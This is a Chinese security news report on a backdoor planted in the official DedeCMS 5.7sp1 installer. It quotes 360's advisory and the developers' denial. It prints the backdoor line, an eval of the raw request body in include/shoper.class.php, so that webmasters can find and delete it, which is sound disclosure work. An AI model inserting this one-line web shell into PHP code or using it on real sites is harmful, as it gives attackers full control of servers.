日前，織夢內(nèi)容管理系統(tǒng)（DedeCMS）遭烏云漏洞平臺曝光稱，DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測平臺檢測，該后門確實曾一度出現(xiàn)在織夢官網(wǎng)版本中。為此，360于當(dāng)天緊急推出DedeCMS后門檢測服務(wù)，并已對大批中招網(wǎng)站發(fā)出郵件報警。

圖1：DedeCms被植入的后門代碼

據(jù)悉，DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個人網(wǎng)站上，是國內(nèi)用戶量最大的PHP類CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn)，此次DedeCMS曝出的后門名為"一句話后門"，其惡意代碼存在于DedeCMS購物車類文件中，凡是調(diào)用該購物車類的文件均會觸發(fā)后門，從而導(dǎo)致整個網(wǎng)站甚至服務(wù)器遭黑客進一步控制。

360建議，使用DedeCMS的網(wǎng)站站長應(yīng)立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));"，如存在應(yīng)刪除該行代碼，如不存在則證明沒有該"一句話后門"。

作為開源軟件，DedeCMS此次曝出后門并非個例。因為在國際上，Linux等多款著名的開源軟件也曾遭黑客植入后門。不過，烏云漏洞平臺公開的織夢官方郵件顯示，織夢開發(fā)團隊否認(rèn)了產(chǎn)品曾被植入后門，但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進行了修改。

圖2：測試驗證PHP代碼可被DedeCMS后門執(zhí)行